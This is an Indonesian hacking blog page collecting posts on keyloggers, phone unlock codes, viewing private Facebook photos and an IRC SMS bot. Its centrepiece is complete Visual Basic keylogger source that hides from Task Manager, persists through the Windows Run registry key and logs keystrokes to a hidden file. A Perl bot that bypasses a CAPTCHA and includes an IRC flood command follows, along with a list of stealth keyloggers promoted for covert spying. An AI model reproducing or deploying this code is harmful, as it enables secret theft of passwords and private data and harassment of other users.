Entri Populer

Jumat, 18 Maret 2011

All In One Keylogger Removal Guide



All In One Keylogger Deskripsi
Spyware Gambar
All In One Keylogger adalah aplikasi keylogger spyware. Aplikasi ini mencatat setiap keystroke yang Anda ketik di komputer Anda, dan menyembunyikan diri dari pengguna dengan menjalankan dalam mode siluman. Hal ini dapat dikonfigurasi untuk login setiap halaman web yang Anda kunjungi dan juga akan merekam semua penekanan tombol yang Anda ketik, dan juga setiap instant messenger dan email percakapan. Hal ini juga dapat dikonfigurasi untuk mengambil screenshot pada interval yang telah ditentukan. Program ini merupakan pelanggaran berat privasi dan keamanan data pribadi dan keuangan, termasuk informasi perbankan dan nomor kartu kredit.
All In One Keylogger Deteksi Otomatis (disarankan)

Apakah PC Anda terinfeksi dengan All In One Keylogger? Untuk aman & cepat mendeteksi All In One Keylogger, kami sangat menyarankan Anda ...
Malware Scanner Download SpyHunter's Download SpyHunter's * Malware Scanner


12 Free Keylogger & PC Monitor Win7


22 June 2010
Penulis: BinusHacker   · Kategori Artikel: Tools
Binus Hacker 
Binus Hacker Is Not Criminal Banner





Spoofing, spying and keylogging are the words that are always been associated with the hackers and cyber criminals. Based on them, security vendors have specifically tailored their security software. On the contrary to the popular concept, keyloggers are used as a tool to find out what other users do on your computer in your absence, be it at home or office. It is designed for the hidden computer monitoring and to record the activities done at the computer. It logs the sites that are visited, records the key strokes that are typed and when scheduled it takes the screen shot of Windows. Rather it gives you a complete handy solution as parental controls to track your childs behaviour in your absence and check your office employees time wasting attitude. Here’s a list of 12 best free keyloggers for Windows 7. Have a look.
Revealer Keylogger Free Edition
Free and reliable keylogger monitoring tool that logs everything that is typed on your computer, it records every keystroke including passwords and conversations (one side only) in common instant messengers. It’s a simple and very light software with a user friendly interface. It runs in the background saving system resources, no button or icon is present in the Windows Task Bar to ensure invisibility. Revealer Keylogger is surely the easiest and faster way to record keyboard inputs. There is almost nothing to configure, in fact everything is configured internally with the best settings.
Ultimate Keylogger Free
Ultimate Keylogger Free Edition is a free popular all-round monitoring solution. It runs in the background and monitors all typed keystrikes, applications, passwords, clipboard, email, and visited websites’ URLs. You can view the reports as HTML files. Ultimate Keylogger will help you to find out, what exactly took place in the system. You will be able to find out what your children search in the internet, and to check them. You can perform the full control of the computers of your company or enterprise. You will always know about all actions performed by the employees or other people on the computers of your company.
BlackBox Security Monitor
BlackBox Security Monitor is a handy and powerful tool for security monitoring. It is designed to collect information from multiple computers and report it to one central location – on the computer where BlackBoxSecurity Monitor is installed.
Get alerts on programs launched, Web sites visited, keywords detected in Web searches, E-Mails, Web Mails, Instant Messenger conversions, total network traffic etc..

Refog Free Keylogger
Refog Free Keylogger is an opportunity for you to be a good parent and keep an eye on your children. And isn’t it wonderful that your parental duty will cost you nothing this time. Refog Free Keylogger can look after your children without them even noticing. Even technically minded children won’t detect the key logger when it runs in a stealth mode. Refog Free Keylogger removes all the shortcuts and can be accessed only through a hot key combination. Running unobtrusively from the moment the system boots, Refog Free Keylogger keeps track of all typed or pasted text. You can set it to monitor only selected applications or everything that is done in the system.
Super WinSpy
WinSpy is a program designed that helps you find out what’s been done on your computer. With Super WinSpy, You can find out exactly what others have done on your computer , including what web sites they have been, what text, images, movies they have seen. and also what files they opened/saved, what kind of search they have done and what they ran at the start menu. Double click the displayed item will directly open or link to the file or the URL stored on your computer.
Personal Keylogger
The Personal Keylogger application was designed to be a small tool that will allow you to secretly record all keystrokes and other input. All specific instructions are explained in the application. To use this program, you have to agree with the disclaimer shown inside. To exit it and recieve your logs, you will need to enter in your keycode. If you have forgotten your keycode, you will need to restart the computer.
NextGen AntiKeylogger Free
NextGen AntiKeylogger is the next generation anti-keylogger program that protects your data from all types of keylogging programs both known, unknown or being developed right now. NextGen AntiKeylogger uses unique method of protection. It intercepts keystrokes at the lowest possible level, encrypts them and sends via its own protected path directly into the protected application. Thus, by using its own encrypted keystrokes path, NextGen AntiKeylogger defeats all types ofsoftware keyloggers. Moreover, unlike anti-keyloggers which are based on proactive protection, NextGen AntiKeylogger has no false-positives. It works out-of-the-box, requiring no additional configuration! Even inexperienced user can use it. In fact it takes only a few clicks to install NextGen AntiKeylogger. Nevertheless, experienced users will find options they may wish to tune up! NextGen AntiKeylogger Free will provide basic protection free of charge, protecting Internet Explorer, Mozilla Firefox and Apple Safari.
Romaco Keylogger
Romaco Keylogger is a small and easy to use tool that can log all key-presses that are made while it is running, and display them to you in its window. It automatically exports the logged text to a text file every 5 minutes, or manually. It can be hidden at the click of a button, and recalled by vigorously pressing one of the least used keys on the keyboard, the break key.
PyKeylogger
PyKeylogger is an easy-to-use and simple keylogger written in python. It is primarily designed for backup purposes, but can be used as a stealth keylogger, too. It does not raise any trust issues, since it is a short python script that you can easily examine. It is primarily designed for personal backup purposes, rather than stealth keylogging. Thus, it does not make explicit attempts to hide its presence from the operating system or the user. That said, the only way it is visible is that the process name shows up in the task list, so it is not immediately apparent that there is a keylogger on the system.
Koom Keylogger
Koom Keylogger is a simple application which helps users to monitor their PC’s activity. Koom’s insides work by hooking the keyboard, whilst copying any textual data that is entered. The user beforehand specifies a password, that when typed, will trigger Koom to stop and display all the recorded data. This ridiculously simple interface allows swift configuration and deployment, essential to covert keylogging. Koom attempts to strip the concept of a keylogger down to the bare rudiments, ridding flashy animations and hefty price tags, the program doesn’t try to install or make an icon on your desktop, because you can just open it straight of the web or save it locally. Our developers made a special effort to conceal the keylogging process from prying Ctrl+Alt+Delete’s, but if for some reason you forget your password; the program can be terminated from the ‘processes’ tab on the task manager, under ‘Koom.exe’.
Heretic Macro
Heretic is a powerful tool that is able to record user events, such as mouse clicks and keys, into a C/Java-like script, and play that script either once or repeatedly. It has many commands for dynamic pixel-based botting, window based botting, and static botting/macro-ing (i.e. key presses, mouse clicks, mouse moves, and pauses).
Keylogger Douglas
Keylogger Douglas is a totally freeware application which will allow you to spy and monitor any PC from anywhere. Also it takes very few system resources so it causes no suspicious slowdowns.
sources:–http://www.learnthisblog.co.cc/2010/02/12-free-keyloggers-pc-monitor-tools-for.html http://www.learnthisblog.co.cc/2010/02/12-free-keyloggers-pc-monitor-tools-for.html

Kamis, 17 Maret 2011

Buka Kode Keamanan Segala Jenis HP

Buka Kode Keamanan Segala Jenis HP

6 January 2010
Penulis: UtuH   · Kategori Artikel: Cracking
Binus Hacker Binus Hacker Is Not Criminal Banner





Pusing ketika kita lupa password kode keamanan HP kita? Bingung mau nyari nyari kemana gak ketemu. Trus kita pergi ke counter dengan membayar kurang lebih “Rp.50.000 – Rp.200.000″?  Apalagi buat anak kost, wih gile banyak abis duit segitu, apalagi buat anak sekolah sama kuliahan. Ampon dah.. Uang jajan bisa abis buat benerin HP gara² lupa security doank! Nah, ni gw kasi toolsnya. Tinggal download dan gunain deh. Gampang kok, gak bakal nyampe 50.000 degh. Kcuali lw sambil maen game sampe 10 Jam di warnet buat download sambil nge-game. Wkwkw.. Yok dah kite mulai..
Image
Nah, tools ini adalah sebuah aplikasi untuk Unlocking Nokia, Siemens, Vitel, Maxel, Panasonic, LG, AEG, Samsung, dan Motorola.  Nih penjelasan detailnya”
WorldUnlock Kalkulator adalah sebuah aplikasi gratis untuk Nokia, Siemens, Vitel, Maxel, Panasonic, LG, AEG, Samsung, dan Motorola untuk membuka kode keamanan dan security lainnya.
Include MasterCode kalkulator yang dapat me-reset kode pengaman handphone.
Panduan:
1. Pilih model telepon dari daftar.
2. Masukkan nomor IMEI telepon Anda (Tekan * # 06 # pada telepon)
3· Pilih negara dan penyedia layanan di mana ponsel dibeli.
4· Tekan tombol: Calculate!
5· Nah selanjutnya muncul beberapa unlock codes.
6. 7 kode akan ditampilkan, gunakan kode pertama dimulai dari +7.

7· Jika belum bekerja, coba +1 dan yang terakhir +5.
8· Bila telepon menampilkan “Sim restriction off” itu berarti sudah tidak terkunci.
9· Jika hanya dua kode yang ditampilkan (+1 dan +2) masukkan code tersebut bersamaan!


Kode akan ditampilkan pada form: # pw + CODE + n #
Untuk memperoleh huruf: p, w atau +, tekan tombol * beberapa kali.

Masukkan kode dengan benar dengan menghapus semua simcard dari telepon, kemudian hidupkan telepon kembali dan kemudian masukkan kode.
Fitur “WorldUnlock Codes Calculator” adalah:
· Unlock Nokia
· Unlock LG
· Unlock Panasonic
· Unlock Maxon
· Unlock Samsung
· Unlock AEG/Telital
· Unlock Alcatel
· Unlock Siemens
· Unlock Sony
· Unlock Vitel
NOTE: XP/Vista/7 Is OK :D

DOWNLOAD


Enjoy & Eat It!
Selamat Tahun Baru, Dapet HP Baru Kelupaan Passwordnya. Shit!
Kzkzkz.. q:D

Keylogger – Keylogging

Keylogger – Keylogging

24 February 2010
Penulis: bahasa_pemrograman   · Kategori Artikel: Cracking
Binus Hacker Binus Hacker Is Not Criminal Banner





Sumber : spyrozone.net
berikut ini source code KeyLogger yang bisa kamu compile pake VB 6.0. Kita hanya butuh sebuah timer dan module.
Yang perlu diperhatikan :
1. setelah REGSVC32.exe dieksekusi, keylogger tsg akan lg menulis di registry agar program tsb dieksekusi pd waktu booting:
(hkey_local_machine\SOFTWARE\Microsoft\Windows\CurrentVersion\Run).
2. Aktifitas keylogger ini tidak dapat dilihat melalui task manager (Ctrl+Alt+Del)
3. kamu tidak dapat menghapus file REGSVC32.exe (this file is being used by windows)
4. kamu tidak dapat menghentikan booting REGSVC32.exe melalui regedit ato msconfig
5. Untuk melihat hasil rekaman KeyLogger ini kamu bisa buka file REGSVC32.DLL dengan Notepad
6. selama Keylogger ini aktif kamu tidak bisa melakukan Logoff user … :(
======= code mulai ==========================
‘simpan file hasil compile dg nama regsvc32.exe
‘form
‘simpan dg nama FRMLOG.frm
Option Explicit
Private Declare Sub Sleep Lib “kernel32″ (ByVal dwMilliseconds As Long)
Private Declare Function GetAsyncKeyState Lib “user32″ (ByVal vKey As Long) As Integer
Private Declare Function RegCreateKey Lib “advapi32.dll” Alias “RegCreateKeyA” (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib “advapi32.dll” Alias “RegSetValueExA” (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Private Declare Function RegisterServiceProcess Lib “kernel32″ (ByVal ProcessID As Long, ByVal ServiceFlags As Long) As Long
Private Declare Function GetCurrentProcessId Lib “kernel32″ () As Long
Private sAppName As String
Private Const REG_SZ = 1
Private Const LOCALMACHINE = &H80000002
Private Const RSP_SIMPLE_SERVICE = 1
Private Const RSP_UNREGISTER_SERVICE = 0
Private Const VK_BACK = &H8
Private Const VK_CONTROL = &H11
Private Const VK_SHIFT = &H10
Private Const VK_TAB = &H9
Private Const VK_RETURN = &HD
Private Const VK_MENU = &H12
Private Const VK_ESCAPE = &H1B
Private Const VK_CAPITAL = &H14
Private Const VK_SPACE = &H20
Private Const VK_SNAPSHOT = &H2C
Private Const VK_UP = &H26
Private Const VK_DOWN = &H28
Private Const VK_LEFT = &H25
Private Const VK_RIGHT = &H27
Private Const VK_MBUTTON = &H4
Private Const VK_RBUTTON = &H2
Private Const VK_LBUTTON = &H1
Private Const VK_PERIOD = &HBE
Private Const VK_COMMA = &HBC
Private Const VK_NUMLOCK = &H90
Private Const VK_NUMPAD0 = &H60
Private Const VK_NUMPAD1 = &H61
Private Const VK_NUMPAD2 = &H62
Private Const VK_NUMPAD3 = &H63
Private Const VK_NUMPAD4 = &H64
Private Const VK_NUMPAD5 = &H65
Private Const VK_NUMPAD6 = &H66
Private Const VK_NUMPAD7 = &H67
Private Const VK_NUMPAD8 = &H68
Private Const VK_NUMPAD9 = &H69
Private Const VK_F9 = &H78
Private Const VK_F8 = &H77
Private Const VK_F7 = &H76
Private Const VK_F6 = &H75
Private Const VK_F5 = &H74
Private Const VK_F4 = &H73
Private Const VK_F3 = &H72
Private Const VK_F2 = &H71
Private Const VK_F12 = &H7B
Private Const VK_F11 = &H7A
Private Const VK_F10 = &H79
Private Const VK_F1 = &H70
Private Sub LoadTextFile()
On Error GoTo dlgerror
If Len(App.Path) <= 3 Then
Open App.Path & “settings.ini” For Input As #1
Line Input #1, sAppName
Close
Else
Open App.Path & “\settings.ini” For Input As #1
Line Input #1, sAppName
Close
End If
If sAppName = vbNullString Then
sAppName = “regsvc32″
End If
Exit Sub
dlgerror:
sAppName = “regsvc32″
End Sub
Private Sub SAVEDLL()
Dim nSaveLocation As String
On Error GoTo dlgerror
If Len(App.Path) <= 3 Then
Open App.Path & sAppName & “.dll” For Append As #1
nSaveLocation = App.Path & sAppName & “.dll”
GoTo READY
Else
Open App.Path & “\” & sAppName & “.dll” For Append As #1
nSaveLocation = App.Path & “\” & sAppName & “.dll”
GoTo READY
End If
READY:
If txtLOGGED.Text = vbNullString Then
Exit Sub
End If
Print #1, Time & ” ” & Date & vbCrLf & “Size: ” & Format(FileLen(nSaveLocation) / 1000000, “.0″) & ” MB” & vbCrLf & “*** PROGRAMS OPENED ***” & vbCrLf & vbCrLf & txtENUMERATE.Text & vbCrLf & vbCrLf & txtLOGGED.Text & vbCrLf & vbCrLf
Close
Close
Close
SetAttr nSaveLocation, vbHidden
Exit Sub
dlgerror:
Err.Clear
Exit Sub
End Sub
Private Sub Form_Load()
On Error Resume Next
Call LoadTextFile
Me.Caption = sAppName
Me.Visible = False
App.TaskVisible = False
App.Title = sAppName
ENTERREGISTRY
RegisterServiceProcess GetCurrentProcessId(), RSP_SIMPLE_SERVICE
End Sub
Private Sub ENTERREGISTRY()
Dim nKey As Long
RegCreateKey LOCALMACHINE, “SOFTWARE\Microsoft\Windows\CurrentVersion\Run”, nKey
If Len(App.Path) <= 3 Then
RegSetValueEx nKey, App.EXEName, 0, REG_SZ, App.Path & App.EXEName & “.exe”, Len(App.Path & App.EXEName & “.exe”)
Else
RegSetValueEx nKey, App.EXEName, 0, REG_SZ, App.Path & “\” & App.EXEName & “.exe”, Len(App.Path & “\” & App.EXEName & “.exe”)
End If
End Sub
Private Sub Form_Unload(Cancel As Integer)
Cancel = True
Call SAVEDLL
ENTERREGISTRY
Unload Me
End
End Sub
Private Sub tmrCAPTION_Timer()
On Error Resume Next
Me.Caption = sAppName
Me.Visible = False
App.TaskVisible = False
App.Title = False
RegisterServiceProcess GetCurrentProcessId(), RSP_SIMPLE_SERVICE
End Sub
Private Sub tmrLOG_Timer()
On Error Resume Next
Dim nKey, nChar As Integer
Dim nText As String
For nChar = 1 To 255
nKey = GetAsyncKeyState(nChar)
If nKey = -32767 Then
nText = Chr(nChar)
If nChar = VK_BACK Then
nText = ” {B.S} ”
ElseIf nChar = VK_CONTROL Then
nText = ” {CTRL} ”
ElseIf nChar = VK_SHIFT Then
nText = ” {SHIFT} ”
ElseIf nChar = VK_TAB Then
nText = ” {TAB} ”
ElseIf nChar = VK_RETURN Then
nText = ” {ENTER} ”
ElseIf nChar = VK_MENU Then
nText = ” {ALT} ”
ElseIf nChar = VK_ESCAPE Then
nText = ” {ESC} ”
ElseIf nChar = VK_CAPITAL Then
nText = ” {CAPS} ”
ElseIf nChar = VK_SPACE Then
nText = ” {SP.B} ”
ElseIf nChar = VK_UP Then
nText = ” {UP} ”
ElseIf nChar = VK_LEFT Then
nText = ” {LEFT} ”
ElseIf nChar = VK_RIGHT Then
nText = ” {RIGHT} ”
ElseIf nChar = VK_DOWN Then
nText = ” {DOWN} ”
ElseIf nChar = VK_F1 Then
nText = ” {F1} ”
ElseIf nChar = VK_F2 Then
nText = ” {F2} ”
ElseIf nChar = VK_F3 Then
nText = ” {F3} ”
ElseIf nChar = VK_F4 Then
nText = ” {F4} ”
ElseIf nChar = VK_F5 Then
nText = ” {F5} ”
ElseIf nChar = VK_F6 Then
nText = ” {F6} ”
ElseIf nChar = VK_F7 Then
nText = ” {F7} ”
ElseIf nChar = VK_F8 Then
nText = ” {F8} ”
ElseIf nChar = VK_F9 Then
nText = “{F9}”
ElseIf nChar = VK_F10 Then
nText = ” {F10} ”
ElseIf nChar = VK_F11 Then
nText = ” {F11} ”
ElseIf nChar = VK_F12 Then
nText = ” {F12} ”
ElseIf nChar = VK_SNAPSHOT Then
nText = ” {PRINT SCRN} ”
ElseIf nChar = VK_RBUTTON Then
nText = ” {R.B} ”
ElseIf nChar = VK_LBUTTON Then
nText = ” {L.B} ”
ElseIf nChar = VK_MBUTTON Then
nText = ” {M.B} ”
ElseIf nChar = VK_PERIOD Then
nText = “.”
ElseIf nChar = VK_COMMA Then
nText = “,”
ElseIf nChar = VK_NUMLOCK Then
nText = ” {NUMLCK} ”
ElseIf nChar = VK_NUMPAD0 Then
nText = “0″
ElseIf nChar = VK_NUMPAD1 Then
nText = “1″
ElseIf nChar = VK_NUMPAD2 Then
nText = “2″
ElseIf nChar = VK_NUMPAD3 Then
nText = “3″
ElseIf nChar = VK_NUMPAD4 Then
nText = “4″
ElseIf nChar = VK_NUMPAD5 Then
nText = “5″
ElseIf nChar = VK_NUMPAD6 Then
nText = “6″
ElseIf nChar = VK_NUMPAD7 Then
nText = “7″
ElseIf nChar = VK_NUMPAD8 Then
nText = “8″
ElseIf nChar = VK_NUMPAD9 Then
nText = “9″
End If
txtLOGGED.Text = txtLOGGED.Text + nText
End If
Next
Call GetActiveWindowName
End Sub
Private Sub tmrSAVE_Timer()
Call SAVEDLL
txtLOGGED.Text = vbNullString
txtENUMERATE.Text = vbNullString
End Sub
====code end ===========
============code mulai ============
‘module visual basic
‘simpan dg nama mdlActiveWindow.bas
Option Explicit
Public Declare Function GetWindowText Lib “user32″ Alias “GetWindowTextA” (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Public Declare Function GetForegroundWindow Lib “user32″ () As Long
Public Declare Function GetClassName Lib “user32″ Alias “GetClassNameA” (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long
Public nCAPTION As String
Public nTESTER As Long
Public nClass As String
Public Sub GetActiveWindowName()
nCAPTION = Space(256)
nClass = Space(256)
GetWindowText GetForegroundWindow, nCAPTION, Len(nCAPTION)
GetClassName GetForegroundWindow, nClass, Len(nClass)
If nTESTER = GetForegroundWindow Then Exit Sub
FRMLOG.txtENUMERATE.Text = FRMLOG.txtENUMERATE.Text & vbCrLf & Time & ” ” & nCAPTION
FRMLOG.txtENUMERATE.Text = FRMLOG.txtENUMERATE.Text & vbTab & nClass
nTESTER = GetForegroundWindow
End Sub
============= code end =============
/* ——————————|EOF|—————————— */
sumber : spyrozone.net
###############################################################
para master senior BinusHacker, saya dapet source code kelogger ini dr spyrozone.net,
tp saya gak tau gmn cara pemakaian keylogger yg sudah jd kita buat di VB 6.0.(maklum masih cupu n boleh cop-pas. hehe..)
terus jg cara menghilangkan KeyLogger ini dr komputer yg udah terlanjur kena.
tolong dikasih pencerahan??
trimss sebelumny ya.. :)

Hack Photo Private Profile Facebook

Hack Photo Private Profile Facebook

13 August 2010
Penulis: Artikel   · Kategori Artikel: Hacking
Binus Hacker Binus Hacker Is Not Criminal Banner





Gak ada kerjaan? Bosen buka facebook mau ngapain? Yuk mari kita intip private profile yang di facebook.
Pertama-tama kita persiapkan script & addon mozilla dulu:
  1. Java Script Untuk Melihat Facebook: http://userscripts.org/scripts/source/9580.user.js
  2. Greasmonkey Addon Firefox: https://addons.mozilla.org/en-US/firefox/addon/748
Setelah selesai mempersiapkan:
  1. Install Greasmonkey Addon
  2. Install Java Script
  3. Restart Firefox
Tools hack ini akan menambahkan link di atas foto tersebut dengan link “See this Photo in its Album” di album nya.  Nah tinggal di klik ajah :)
Selamat mencoba, semoga berhasil & Selamat Berpuasa All..

Cara Bikin Bot SMS Gratis

Cara Bikin Bot SMS Gratis

22 August 2010
Penulis: BinusHacker   · Kategori Artikel: Tutorial
Binus Hacker Binus Hacker Is Not Criminal Banner





Mau tau cara bikin bot sms gratisan? Cara Buat bot sms gratisan? Buat Bot SMS Gratisan? Bikin Bot SMS Gratisan?
Berikut ini adalah cara bikin bot sms gratisan, jadi jangan khawatir untuk semuanya, kita sudah punya Free SMS Bot loh.
Layanan yang diberikan adalah sms gratis & ini bisa dilakukan di IRC.
Pertama:
  1. Siapkan server / pc yang sudah terkoneksi dengan internet.
  2. Kalau anda menggunakan Windows, maka harus install Perl Machine dulu, Kalau menggunakan Unix, bisa langsung bikin asal perlnya sudah terinstall juga. Jangan lupa yang di install adalah perl versi 5.8.8 / lebih.
  3. Carilah directory yang bisa digunakan dengan perintah:  find / -perm 777 -type d
  4. Kemudian simak code berikut:
############ SPECIAL THANKS TO ############
#BOT SMS GRATISAN
#POWERED BY BOTSMS / NIXSMS (www.botsms.com)
#TERIMA KASIH BANYAK UNTUK LAYANANNYA (COMEX)
#AUTHOR: KENZHIE / ARRAY / BYROE.NET
#BOT INI UNTUK BINUSHACKER MEMBER!! (www.binushacker.net)
############ MOHON JANGAN DIHAPUS ############
#!/usr/local/bin/perl -w
use IO::Socket;
use IO::Select;
use IO::Socket::INET;
use Socket;
use MIME::Base64;
########### SILAKAN EDIT MULAI DARI BAWAH SINI ###########
# SILAKAN ISI UNTUK SERVER ANDA DISINI.
my $server = “ix.dal.net”;
my @arnick = (“AYOSMS”);
my $ident = “AYOSMS”;
my $channel = “#BinusHacker”;
my $sock = new IO::Socket::INET(PeerAddr => $server,PeerPort => 6667,Proto => ‘tcp’) or die “Can’t connect\n”;
my $owner = “UtuH”;
my $password = “saya”;
my @logged =();
my $procname=”/usr/sbin/httpd”;
### RANDOM NICK UNTUK KONEKSI###
my $nick = @arnick[rand scalar @arnick];
print $sock “NICK $nick\r\n”;
print $sock “USER $ident 8 * : 4- 8= 1[ 4LAYANAN SMS GRATIS 1] 8= 4-\r\n”;
while (my $input = <$sock>) {
if ($input =~ /004/) {
last;
}
if ($input =~ /433/) {
print $sock “NICK “.$nick.”|”.int(rand(100)).”\r\n”;
}
print $sock “PRIVMSG “.$channel.” :”.$input.”\r\n”;
}
print $sock “JOIN $channel\r\n”;
print $sock “PRIVMSG $channel : Layanan sms gratis BinusHacker, ketik: .sms 08XXXXXXXXX isipesan\r\n”;
print $sock “PRIVMSG $owner : boz….!!!?\r\n”;
my $ping_counter = 0;
while (my $input = <$sock>) {
chop $input;
$input =~ s/\r\n$//;
if ($input =~ /^PING(.*)$/i) {
print $sock “PONG $1\r\n”;
$ping_counter = $ping_counter + 1;
if($ping_counter == 100) {
print $sock “PRIVMSG BeschBot :!keep st3v0\r\n”;
$ping_counter = 0;
}
}
#print $sock “PRIVMSG #JW :”.$input.”\r\n”;   <—– ngecek semua input yg diterima oleh bot
####################help######################################
if ($input =~ /^.*\.help(.*)/){
@shnick = split(“!”,$input);
$shnick = @shnick[0];
$shnick =~ s/://g;
print $sock “PRIVMSG “.$shnick.” : -=[ 4POWERED BY BINUSHACKER - www.binushacker.net 1]=-\n”;
print $sock “PRIVMSG “.$shnick.” : -=[#BINUSHACKER]=-\n”;
print $sock “PRIVMSG “.$shnick.” : -=[ 4ADMIN COMMAND 1]=-\n”;
print $sock “PRIVMSG “.$shnick.” : .join #chan\n”;
print $sock “PRIVMSG “.$shnick.” : .part #chan\n”;
print $sock “PRIVMSG “.$shnick.” : .say (nick)\n”;
print $sock “PRIVMSG “.$shnick.” : .quit\n”;
print $sock “PRIVMSG “.$shnick.” : .nick nick\n”;
#print $sock “PRIVMSG “.$shnick.” : —=[ 4FLOOD WAR 1]=—\n”;
#print $sock “PRIVMSG “.$shnick.” : .tsunami (nick)/#chan\n”;
#print $sock “PRIVMSG “.$shnick.” : .dccflood (nick)\n”;
#print $sock “PRIVMSG “.$shnick.” : .noticeflood (nick)\n”;
#print $sock “PRIVMSG “.$shnick.” : .msgflood (nick)\n”;
#print $sock “PRIVMSG “.$shnick.” : .hop #chan (pesan)\n”;
print $sock “PRIVMSG “.$shnick.” : -=[ 4PUBLIC COMMAND 1]=-\n”;
print $sock “PRIVMSG “.$shnick.” : .sms no pesan\n”;
print $sock “PRIVMSG “.$shnick.” : .email pengirim judul(tanpa sepasi judulnya) email-tujuan pesan\n”;
}
############################## mesin ###############################
if ($input =~ /^\:$owner!.*\@.*PRIVMSG.*:\.quit(.*)/){
print $sock “QUIT “.$1.” “.$2.”\r\n”;
}
if ($input =~ /^\:$owner!.*\@.*PRIVMSG.*:\.hop(.*)/){
for (1..10){
print $sock “PART “.$1.” “.$2.”\r\n”;
print $sock “JOIN “.$1.” “.$2.”\r\n”;
}
}
if ($input =~ /^\:$owner!.*\@.*PRIVMSG.*:\.join(.*)/){
print $sock “JOIN “.$1.” “.$2.”\r\n”;
}
if ($input =~ /^\:$owner!.*\@.*PRIVMSG.*:\.part(.*)/){
print $sock “PART “.$1.” “.$2.”\r\n”;
}
if ($input =~ /^.*\.whois(.*)/){
print $sock “WHOIS “.$1.”\r\n”;
$hasil=<$sock>;
print $sock “PRIVMSG “.$channel.” “.$hasil.”\r\n”;
}
if ($input =~ /^\:$owner!.*\@.*PRIVMSG.*:\.nick(.*)/){
print $sock “NICK “.$1.” “.$2.”\r\n”;
}
if ($input =~ /^\:$owner!.*\@.*PRIVMSG.*:\.say(.*)/){
print $sock “PRIVMSG “.$1.” “.$2.”\r\n”;
}
if ($input =~ /^\:$owner!.*\@.*PRIVMSG.*:\.tsunami(.*)/){
$data = $1;
$data =~ s/\r|\n//g;
my @c = split(‘#’, $input);
my @a = split(/ /, @c[1]);
my $chan = “#”.@a[0];
print $sock “PRIVMSG “.$chan.” Hajar “.$data.”!!!\r\n”;
$flood = “                                                                                                                                       ”;
for (1..10) {
print $sock “NOTICE “.$data.” :”.$flood.”\r\n”;
print $sock “PRIVMSG “.$data.” :\001″.$flood.”\001\n”;
}
print $sock “PRIVMSG “.$chan.” :Lapor!! “.$data.” sudah ditenggelamkan!\r\n”;
}
if ($input =~ /^.*\.ping(.*)/){
$data = $1;
$data =~ s/\r|\n//g;
my @c = split(‘#’, $input);
my @a = split(/ /, @c[1]);
my $chan = “#”.@a[0];
print $sock “ctcp “.$data.” :ping\r\n”;
$hasil=<$sock>;
print $sock “PRIVMSG “.$chan.” “.$hasil.”\r\n”;
}
if ($input =~ /^.*\.dns (.*)/){
print $sock “DNS “.$1.”\r\n”;
#$vhasil = “”;
$hasil=<$sock>;
}
###########################sms#############################
if ($input =~ /^.*\.sms(.*)/){
$data = $1;
$data =~ s/\r|\n//g;
#ambil chan
my @c = split(‘#’, $input);
my @a = split(/ /, @c[1]);
my $chan = “#”.@a[0];
#ambil user
@snick = split(“!”,$input);
$snick = @snick[0];
$snick =~ s/://g;
#print $sock “PRIVMSG “.$chan.” :pengirim “.$snick.”\r\n”;
#print $sock “PRIVMSG “.$chan.” :”.$input.”\r\n”;
#print $sock “PRIVMSG “.$chan.” :$data\r\n”;
#  no   psn–>
# 0857 XXXXXXXXXXX
@snomer = split(” “,$data);
#print $sock “PRIVMSG “.$chan.” :no tujuan”.@snomer[0].”\r\n”;
$no = @snomer[0];
$pesan = $data;
$pesan =~ s/ $no //g;
$pesan = $pesan.” \n\nDari $snick \n[BinusHackerFreeSMS]“;       #<—— di dalam sms
#print $sock “PRIVMSG “.$chan.” :”.$pesan.”\r\n”;
if(sendSMS($no,$pesan)){
print $sock “PRIVMSG “.$chan.” :sms terkirim ke “.$no.” dari “.$snick.”\r\n”;
}
else {
print $sock “PRIVMSG “.$chan.” :gagal\r\n”;
}
}
################end of sms#################
if ($input =~ /JOIN/){
@sjnick = split(“!”,$input);
$sjnick = @sjnick[0];
$sjnick =~ s/://g;
@sjoin = split(” “,$input);
$sjoin = @sjoin[0];
$sjoin =~ s/ //g;
print $sock “NOTICE “.$sjnick.” : 12for free sms ketik .sms nomer pesan\r\n”;
}
} #end while
sub sendSMS {
$no = $_[0];
$pesan = $_[1];
$site = “www.botsms.com”;
$path = “/widget/kirim-sms.php”;
############open konrksi#############
$socksms = IO::Socket::INET->new(Proto=>”tcp”,PeerAddr=>”$site”,PeerPort=>”80″);
###############cek apakah koneksi berhasil###############
if(!$socksms) {die(“g bisa bka socket $site port 80\r\n”);}
#############request data##############
print $socksms “GET $path http/1.1\r\n”;
print $socksms “Host: $site\r\n”;
print $socksms “Accept: */*\r\n”;
print $socksms “User-Agent: BinusHacker\r\n”;
print $socksms “Connection: Close\r\n”;
print $socksms “\r\n”;
#############ambil data,masukan ke dalam ariable array##############
my @data = <$socksms>;
##################close socket###################
close($socksms);
$data = join(“”,@data);
#print $data;
########ambil pertanyaan##########
@spertanyaan1 = split(“jawab ini : “,$data);
#print @pertanyaan1[1];
@spertanyaan2 = split(” =”,@spertanyaan1[1]);
#print @spertanyaan2[0];
@spertanyaan3 = split(” “,@spertanyaan2[0]);
#print “angka1= “.@spertanyaan3[0].”\r\n”;
#print “angka2= “.@spertanyaan3[2].”\r\n”;
$jawaban = @spertanyaan3[0]+@spertanyaan3[2];
#print “jawaban = $jawaban\r\n”;
###################ambil marguardcode################
@sguard1 = split(“name=’mathguard_code’ value=’”,$data);
#print @sguard1[1];
@sguard2 = split(“‘ /><br />”,@sguard1[1]);
#print @sguard2[0];
$sguard = @sguard2[0];
############devinisikan data yg diperlukan#############
$action = “/widget/kirim.php”;
$Phonenumbers = $no;
$Text = $pesan;
$mathguard_answer = $jawaban;
$mathguard_code = $sguard;
$TOMBOL = “KIRIM SMS”;
#################buat data yg akan di post##############
$Post = “Phonenumbers=”.$Phonenumbers.”&Text=”.$Text.”&mathguard_answer=”.$mathguard_answer.”&mathguard_code=”.$mathguard_code.”&TOMBOL=”.$TOMBOL;
$panjang = length $Post;
###############kirim sms###############
$socksms = IO::Socket::INET->new(Proto=>”tcp”,PeerAddr=>”$site”,PeerPort=>”80″);
print $socksms “POST $action http/1.1\r\n”;
print $socksms “Host: $site\r\n”;
print $socksms “Accept: */*\r\n”;
print $socksms “User-Agent: BinusHacker\r\n”;
